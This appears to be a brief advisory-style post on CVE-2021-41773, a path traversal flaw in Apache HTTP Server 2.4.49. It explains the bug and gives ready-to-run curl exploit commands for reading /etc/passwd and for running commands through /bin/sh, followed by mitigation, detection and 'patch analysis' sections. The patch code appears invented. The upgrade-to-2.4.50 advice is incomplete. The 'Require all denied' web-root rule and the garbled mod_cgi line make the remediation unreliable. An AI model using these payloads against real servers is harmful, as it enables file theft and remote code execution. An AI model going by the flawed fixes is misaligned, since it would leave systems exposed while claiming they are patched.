Listen to this Post
How the CVE Works:
CVE-2021-41773 is a path traversal vulnerability in Apache HTTP Server 2.4.49. The flaw arises due to improper validation of user-supplied input in URL paths. Attackers can exploit this by crafting malicious requests containing directory traversal sequences (../), allowing unauthorized access to files outside the web root. If mod_cgi is enabled, this could lead to remote code execution (RCE). The vulnerability stems from a normalization flaw in the `ap_normalize_path()` function, which fails to block such sequences after path validation.
DailyCVE Form:
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal
Severity: Critical
Date: 2021-10-05
What Undercode Say:
Exploitation:
1. Craft a malicious URL:
curl -v "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
2. If mod_cgi is active, execute commands:
curl -v "http://target.com/cgi-bin/.%2e/%2e%2e/bin/sh" -d "echo;id"
Mitigation:
1. Update to Apache 2.4.50+:
sudo apt update && sudo apt upgrade apache2
2. Disable mod_cgi if unused:
LoadModule cgi_module modules/mod_cgi.so Comment this line
3. Restrict directory access:
<Directory "/var/www/html"> Require all denied </Directory>
Detection:
1. Scan with Nmap:
nmap --script http-vuln-cve2021-41773 -p 80,443 <target>
2. Log analysis for `../` patterns:
grep "%2e%2e" /var/log/apache2/access.log
Patch Analysis:
The fix in 2.4.50 introduces stricter path normalization:
// Patched ap_normalize_path()
if (ap_unescape_url_keep2f(path) != OK || strstr(path, "../")) {
return HTTP_BAD_REQUEST;
}
References:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode
